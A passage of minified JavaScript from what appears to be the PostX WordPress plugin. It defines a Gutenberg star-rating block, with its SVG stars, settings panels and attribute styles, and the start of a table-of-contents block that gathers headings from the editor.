l=Z>=t+1?O>t?100*(O-t):0:Z>t?100*(Z-t):0;return(0,o.createElement)(c,{key:t},(0,o.createElement)(b,{index:t,id:`${t}${k}`,range:l,type:C,onHover:j,onClick:H,setAttributes:y}))}))),E&&(0,o.createElement)(m,{key:"editable",tagName:"div",className:"ultp-rating-title",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Write Message","ultimate-post"),onChange:e=>y({titleText:e}),value:S}))))}const b=({index:e,range:t,onHover:l,onClick:a,setAttributes:i,type:n,id:r})=>{const s=`clip-${r}`,p=t=>{const{left:o,width:a}=t.currentTarget.getBoundingClientRect(),i=(t.clientX-o)/a;l(i<=.5?e+.5:e+1)},u=t=>{const{left:l,width:o}=t.currentTarget.getBoundingClientRect(),n=(t.clientX-l)/o<=.5?e+.5:e+1;a(n),i({smallRange:`${n}`,largeRange:`${n}`})};return(0,o.createElement)(c,null,"outline"==n?(0,o.createElement)(v,{handleMouseMove:p,handleClick:u,clipId:s,onHover:l,range:t}):(0,o.createElement)(h,{handleMouseMove:p,handleClick:u,onHover:l,clipId:s,range:t}))},v=({range:e,onHover:t,clipId:l,handleMouseMove:a,handleClick:i})=>(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",style:{pointerEvents:"auto"},xmlns:"http://www.w3.org/2000/svg",onClick:i,onMouseLeave:()=>t(null),onMouseMove:a},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:e/100*20,height:"20"}))),(0,o.createElement)("path",{fill:"none",stroke:"#ddd",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fill:"none",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"})),h=({range:e,onHover:t,clipId:l,handleMouseMove:a,handleClick:i})=>(0,o.createElement)(c,null,(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",fill:"none",onMouseMove:a,onMouseLeave:()=>t(null),onClick:i,style:{pointerEvents:"auto"},xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:e/100*20,height:"20"}))),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",fill:"#E0E0E0",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fillRule:"evenodd",clipRule:"evenodd",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"})))},63939:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const{useBlockProps:a}=wp.blockEditor;function i(e){const{blockId:t,advanceId:l,enableTitle:i,titleText:s,startRange:p,largeRange:c,smallRange:u,className:d,starType:m}=e.attributes,g="small"===p?5:10,y="small"===p?20*u:10*c,b=a.save({className:`ultp-block-${t} ${d}`,...l&&{id:l}});return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",b,(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-rating-block"},(0,o.createElement)("div",{className:"ultp-rating-icon"},Array("small"==p?5:10).fill().map(((e,l)=>{const a=100/g,i=Math.min(Math.max(y-l*a,0),a)/a*100;return(0,o.createElement)(o.Fragment,{key:l},"outline"==m?(0,o.createElement)(n,{id:`${l}${t}`,range:i}):(0,o.createElement)(r,{id:`${l}${t}`,range:i}))}))),i&&s?.length?(0,o.createElement)("div",{className:"ultp-rating-title",dangerouslySetInnerHTML:{__html:s}}):"")))}const n=({range:e=100,id:t})=>{const l=`clip-${t}`,a=e/100*20;return(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",width:`${a}`,height:"20"}))),(0,o.createElement)("path",{fill:"none",stroke:"#ddd",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fill:"none",stroke:"#F17B2C",strokeWidth:"2",strokeLinejoin:"round",d:"M8.584 2.32723C9.14216 1.12485 10.8589 1.12485 11.417 2.32723L13.1972 6.16205C13.2317 6.23628 13.3041 6.29012 13.3908 6.30033L17.6136 6.79782C18.9289 6.95278 19.4735 8.57699 18.4886 9.48206L15.3649 12.3524C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3524L1.51246 9.48206C0.527493 8.57699 1.07216 6.95278 2.38747 6.79782L6.61022 6.30033C6.69696 6.29012 6.76937 6.23628 6.80383 6.16205L8.584 2.32723Z"}))},r=({range:e=100,id:t})=>{const l=`clip-${t}`,a=e/100*20;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("svg",{width:"80",height:"80",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:l},(0,o.createElement)("rect",{x:"0",y:"0",height:"20",width:`${a}`}))),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",fill:"#E0E0E0",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"}),(0,o.createElement)("path",{clipPath:`url(#${l})`,fillRule:"evenodd",clipRule:"evenodd",fill:"#F17B2C",d:"M8.584 2.32722C9.14216 1.12485 10.8589 1.12484 11.417 2.32722L13.1972 6.16204C13.2317 6.23627 13.3041 6.29011 13.3908 6.30033L17.6136 6.79781C18.9289 6.95277 19.4735 8.57699 18.4886 9.48205L15.3649 12.3523C15.3032 12.409 15.2771 12.4916 15.2928 12.5703L16.1218 16.7155C16.3842 18.0278 14.9812 19.0152 13.8302 18.375L10.1221 16.3125C10.0468 16.2706 9.95428 16.2706 9.87898 16.3125L6.17082 18.375C5.0198 19.0152 3.61687 18.0278 3.87929 16.7155L4.70821 12.5703C4.72396 12.4916 4.6978 12.409 4.63614 12.3523L1.51246 9.48205C0.527493 8.57699 1.07216 6.95277 2.38747 6.79781L6.61022 6.30033C6.69696 6.29011 6.76937 6.23627 6.80383 6.16204L8.584 2.32722Z"})))}},23372:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,{InspectorControls:r}=wp.blockEditor,s=({store:e})=>(0,o.createElement)(r,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8858",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"general",title:__("General","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:e,title:"inline",include:[{position:1,data:{type:"tag",key:"starType",inline:!0,label:__("Rating Style","ultimate-post"),options:[{value:"fill",label:__("Fill","ultimate-post")},{value:"outline",label:__("Outline","ultimate-post")}]}},{position:2,data:{type:"group",key:"startRange",justify:!0,label:__("Range","ultimate-post"),options:[{value:"small",label:__("1–5","ultimate-post")},{value:"large",label:__("1–10","ultimate-post")}]}},{position:3,data:{type:"range",key:"smallRange",min:0,max:5,step:.1,responsive:!1,label:__("Rating Range","ultimate-post")}},{position:4,data:{type:"range",key:"largeRange",min:0,max:10,step:.1,responsive:!1,label:__("Rating Range","ultimate-post")}},{position:5,data:{type:"alignment",key:"contentAlignment",disableJustify:!0,responsive:!0,icons:["juststart","justcenter","justend"],options:["flex-start","center","flex-end"],label:__("Alignment","ultimate-post")}},{position:6,data:{type:"toggle",key:"enableTitle",label:__("Enable Title","ultimate-post")}},{position:7,data:{type:"tag",key:"starPosition",label:__("Star Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]})),(0,o.createElement)(i.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:e,title:__("Star Style","ultimate-post"),include:[{position:1,data:{type:"color",key:"starColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"unmarkedColor",label:__("Unmarked Color","ultimate-post")}},{position:3,data:{type:"range",key:"starSize",min:0,max:300,step:1,responsive:!0,label:__("Star Size","ultimate-post")}},{position:4,data:{type:"range",key:"starGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Stars","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:e,title:__("Title Style","ultimate-post"),include:[{position:1,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:2,data:{type:"color",key:"titleColor",label:__("color","ultimate-post")}},{position:3,data:{type:"range",key:"titleGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title and star","ultimate-post")}}]})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e}))))},87509:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accordionList:{type:"string",default:""},starType:{type:"string",default:"outline"},enableTitle:{type:"boolean",default:!0},titleText:{type:"string",default:""},startRange:{type:"string",default:"small"},smallRange:{type:"string",default:"2.5",style:[{depends:[{key:"startRange",condition:"==",value:"small"}]}]},largeRange:{type:"string",default:"2.5",style:[{depends:[{key:"startRange",condition:"==",value:"large"}]}]},starPosition:{type:"string",default:"left",style:[{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: row-reverse }"},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"right"}]},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: column-reverse; }"},{depends:[{key:"enableTitle",condition:"==",value:!0},{key:"starPosition",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-rating-block { flex-direction: column; }"}]},contentAlignment:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} { justify-content:{{contentAlignment}}; }"}]},starColor:{type:"string",default:"#F17B2C",style:[{depends:[{key:"starType",condition:"==",value:"outline"}],selector:"{{ULTP}} .ultp-rating-block svg path:last-of-type { stroke: {{starColor}}; }"},{depends:[{key:"starType",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-rating-block svg path:last-of-type { stroke:{{starColor}}; fill:{{starColor}}; }"}]},unmarkedColor:{type:"string",default:"#B4B7BF",style:[{depends:[{key:"starType",condition:"==",value:"outline"}],selector:"{{ULTP}} .ultp-rating-block svg path:first-of-type { color: {{unmarkedColor}}; }"},{depends:[{key:"starType",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-rating-block svg path:first-of-type { color: {{unmarkedColor}}; color: {{unmarkedColor}}; }"}]},starSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rating-block svg { height:{{starSize}}; width:{{starSize}}; }"}]},starGap:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rating-icon { gap: {{starGap}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-title"}]},titleColor:{type:"string",default:"#3C3C4399",style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-title { color:{{titleColor}}; }"}]},titleGap:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"enableTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-rating-block { gap:{{titleGap}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},85562:(e,t,l)=>{"use strict";var o=l(67294),a=l(11645),i=l(63939),n=l(87509),r=l(74921);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/star-rating.svg",alt:"Postx Star Rating Block"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/rating.svg"}},edit:a.Z,save:i.Z})},99233:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(43581),s=l(31760),p=l(64766);const{__}=wp.i18n,{InspectorControls:c,RichText:u,BlockControls:d,useBlockProps:m}=wp.blockEditor,{useEffect:g,useState:y,Fragment:b}=wp.element,{ToolbarGroup:v,Button:h}=wp.components,{getBlocks:f}=wp.data.select("core/block-editor"),{getBlockAttributes:k,getBlockRootClientId:w}=wp.data.select("core/block-editor");function x(e){const[t,l]=y("Content"),{setAttributes:x,name:T,attributes:_,clientId:C,className:E,attributes:{previewImg:S,blockId:P,tag:L,advanceId:I,headText:B,layout:U,collapsible:M,collapsibleType:A,togglePosition:H,topTop:N,toTopIcon:j,sticky:Z,listData:O,open:R,close:D,initialCollapsible:z,currentPostId:F}}=e;function W(e){return e.replace(/<\/?[^>]+(>|$)|(amp;)/g,"")}function V(e,t=!0){let l=[];const o=JSON.parse(L||[]);return e.forEach((e=>{if("core/heading"==e.name||"kadence/advancedheading"==e.name){const a=e.attributes.content.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.anchor=i,a&&o.includes("h"+e.attributes.level)&&l.push({content:W(e.attributes.content),level:e.attributes.level,link:i})}else if("greenshift-blocks/heading"==e.name){const a=e.attributes.headingContent.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.id&&t?e.attributes.id:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.id=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingContent),level:Number(e.attributes.headingTag.replace("h","")),link:"gspb_heading-id-"+i})}else if("ultimate-post/heading"==e.name){const a=e.attributes.headingText.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=""!=e.attributes.advanceId&&t?e.attributes.advanceId:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.advanceId=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingText),level:Number(e.attributes.headingTag.replace("h","")),link:i})}else if("uagb/advanced-heading"==e.name){const a=e.attributes.headingTitle.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.anchor=i,a&&o.includes(e.attributes.headingTag)&&l.push({content:W(e.attributes.headingTitle),level:e.attributes.level,link:i})}else if("uagb/container"==e.name)e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]);else if("ugb/heading"==e.name){const a=e.attributes.title.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),i=void 0!==e.attributes.anchor&&t?e.attributes.anchor:a.replace(/( |<.+?>|&nbsp;)/g,"_");if(e.attributes.anchor=i,a){const t=e.attributes.titleTag?e.attributes.titleTag:"h2";o.includes(t)&&l.push({content:W(e.attributes.title),level:Number(t.replace("h","")),link:i})}}else if("ultimate-post/post-grid-1"==e.name||"ultimate-post/post-grid-2"==e.name||"ultimate-post/post-grid-3"==e.name||"ultimate-post/post-grid-4"==e.name||"ultimate-post/post-grid-5"==e.name||"ultimate-post/post-grid-6"==e.name||"ultimate-post/post-grid-7"==e.name||"ultimate-post/post-list-1"==e.name||"ultimate-post/post-list-2"==e.name||"ultimate-post/post-list-3"==e.name||"ultimate-post/post-list-4"==e.name||"ultimate-post/post-module-1"==e.name||"ultimate-post/post-module-2"==e.name||"ultimate-post/post-slider-1"==e.name){if(e.attributes.headingText&&e.attributes.headingShow){const t=e.attributes.headingText.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,""),o=t.replace(/( |<.+?>|&nbsp;)/g,"_");e.attributes.advanceId=o,t&&l.push({content:W(e.attributes.headingText),level:Number(e.attributes.headingTag.replace("h","")),link:o})}}else"ultimate-post/row"==e.name||"ultimate-post/column"==e.name?e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]):"core/columns"==e.name?e.innerBlocks.forEach((e=>{"core/column"==e.name&&(l=[...l,...V(e.innerBlocks)])})):"core/group"==e.name?e.innerBlocks?.length&&(l=[...l,...V(e.innerBlocks)]):"ub/content-toggle-block"==e.name&&e.innerBlocks.forEach((e=>{if("ub/content-toggle-panel-block"==e.name&&e.attributes.panelTitle){const t=e.attributes.panelTitle.replace(/(<\/?[^>]+(>|$))|[_|.$'`*&"#!~@%)(]/g,"").replace(/( |<.+?>|&nbsp;)/g,"_"),a=e.attributes.titleTag?e.attributes.titleTag:"h2";e.attributes.toggleID=t,o.includes(a)&&l.push({content:W(e.attributes.panelTitle),level:Number(a.replace("h","")),link:t})}}))})),l}g((()=>{const e=C.substr(0,6),t=k(w(C));(0,a.qi)(x,t,F,C),P?P&&P!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||x({blockId:e})):x({blockId:e})}),[C]),g((()=>{!function(){const e=V(f());function t(e,l){const o=e.length-1;0===e.length||e[0].level===l.level?e.push(Object.assign({},l)):e[o].level<l.level?e[o].child?t(e[o].child,l):e[o].child=[Object.assign({},l)]:e[o+1]=l}const l=[];e.forEach((e=>t(l,e))),x({listData:JSON.stringify(l)})}()}),[_]);const G={setAttributes:x,name:T,attributes:_,setSection:l,section:t,clientId:C};let q;if(P&&(q=(0,i.Kh)(_,"ultimate-post/table-of-content",P,(0,a.k0)())),S)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:S});const $=m({...I&&{id:I},className:`ultp-block-${P} ${E} ${1==Z?"ultp-toc-sticky":""}`});return(0,o.createElement)(b,null,(0,o.createElement)(d,null,(0,o.createElement)(v,null,(0,o.createElement)(h,{label:"Reset",className:"ultp-btn-reset",icon:"image-rotate","aria-haspopup":"true",tooltip:"Reset Table of Content",onClick:()=>V(f(),!1)},"Reset"))),(0,o.createElement)(c,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6822",store:G}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:G,title:"General",include:[{position:0,data:{type:"layout",block:"table-of-content",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/toc/toc1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/toc/toc2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!1},{img:"assets/img/layouts/toc/toc3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/toc/toc4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0},{img:"assets/img/layouts/toc/toc5.png",label:__("Style 5","ultimate-post"),value:"style5",pro:!0},{img:"assets/img/layouts/toc/toc6.png",label:__("Style 6","ultimate-post"),value:"style6",pro:!0},{img:"assets/img/layouts/toc/toc7.png",label:__("Style 7","ultimate-post"),value:"style7",pro:!0},{img:"assets/img/layouts/toc/toc8.png",label:__("Style 8","ultimate-post"),value:"style8",pro:!0}]}},{position:1,data:{type:"select",key:"tag",label:__("Tag","ultimate-post"),multiple:!0,options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"}]}},{position:2,data:{type:"toggle",key:"initialCollapsible",label:__("Initial Close Table","ultimate-post")}}]}),(0,o.createElement)(a.T,{initialOpen:!1,store:G,title:"Heading",include:[{position:1,data:{type:"text",key:"headText",label:__("Header Text","ultimate-post")}},{position:2,data:{type:"color",key:"headColor",label:__("Color","ultimate-post")}},{position:3,data:{type:"color",key:"headBg",label:__("Background","ultimate-post")}},{position:4,data:{type:"typography",key:"headTypo",label:__("Typography","ultimate-post")}},{position:5,data:{type:"border",key:"headBorder",label:__("Border","ultimate-post")}},{position:6,data:{type:"dimension",key:"headRadius",label:__("Button Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:7,data:{type:"dimension",key:"headPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{initialOpen:!1,store:G,title:__("List Body","ultimate-post"),include:[{position:1,data:{type:"select",key:"hoverStyle",label:__("Hover Style","ultimate-post"),pro:!0,options:[{value:"none",label:"Select"},{value:"style1",label:"Style 1"},{value:"style2",label:"Style 2"},{value:"style3",label:"Style 3"},{value:"style4",label:"Style 4"},{value:"style5",label:"Style 5"}]}},{position:2,data:{type:"range",key:"borderWidth",label:__("Border Width","ultimate-post"),min:0,max:10,step:1,unit:!1,responsive:!1}},{position:3,data:{type:"color",key:"borderColor",label:__("Border Color","ultimate-post")}},{position:4,data:{type:"toggle",key:"sticky",pro:!0,label:__("Enable Sticky","ultimate-post")}},{position:5,data:{type:"tag",key:"stickyPosition",label:__("Sticky Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")}]}},{position:6,data:{type:"range",key:"listWidth",label:__("Width","ultimate-post"),min:0,max:700,step:1,unit:!0,responsive:!0}},{position:7,data:{type:"range",key:"listSpacingX",label:__("Gap Between Lists","ultimate-post"),min:0,max:50,step:1,unit:!1,responsive:!0}},{position:8,data:{type:"range",key:"listSpacingY",label:__("Spacing Y","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0}},{position:9,data:{type:"color",key:"listColor",label:__("Color","ultimate-post")}},{position:10,data:{type:"color",key:"listHoverColor",label:__("Hover Color","ultimate-post")}},{position:11,data:{type:"color",key:"listBg",label:__("Background Color","ultimate-post")}},{position:12,data:{type:"typography",key:"listTypo",label:__("Typography","ultimate-post")}},{position:13,data:{type:"dimension",key:"listPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{depend:"collapsible",initialOpen:!1,store:G,title:__("Collapsible","ultimate-post"),include:[{position:1,data:{type:"tag",key:"togglePosition",label:__("Button Position","ultimate-post"),options:[{value:"withTitle",label:__("Beside Title","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"tag",key:"collapsibleType",label:__("Collapsible Type","ultimate-post"),options:[{value:"text",label:__("Text","ultimate-post")},{value:"icon",label:__("Icon","ultimate-post")}]}},{position:3,data:{type:"text",key:"open",label:__("Open Text","ultimate-post")}},{position:4,data:{type:"text",key:"close",label:__("Close Text","ultimate-post")}},{position:6,data:{type:"color",key:"collapsibleColor",label:__("Color","ultimate-post")}},{position:7,data:{type:"color",key:"collapsibleBg",label:__("Background","ultimate-post")}},{position:8,data:{type:"color",key:"collapsibleHoverColor",label:__("Hover Color","ultimate-post")}},{position:9,data:{type:"color",key:"collapsibleHoverBg",label:__("Hover Background","ultimate-post")}},{position:10,data:{type:"typography",key:"collapsibleTypo",label:__("Typography","ultimate-post")}},{position:11,data:{type:"border",key:"collapsibleBorder",label:__("Border","ultimate-post")}},{position:12,data:{type:"dimension",key:"collapsibleRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:13,data:{type:"dimension",key:"collapsiblePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),(0,o.createElement)(a.T,{depend:"topTop",initialOpen:!1,store:G,title:__("Back To 